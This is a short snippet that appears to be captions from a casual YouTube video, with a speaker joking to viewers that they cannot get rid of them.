RN Ogumby says.
Ha, I'm still here.
Oh, we can send them to Pebble. See you later, YouTubers.
Can get rid on me that easy.
Oh yeah, watch this. Poof.
No. Still watching.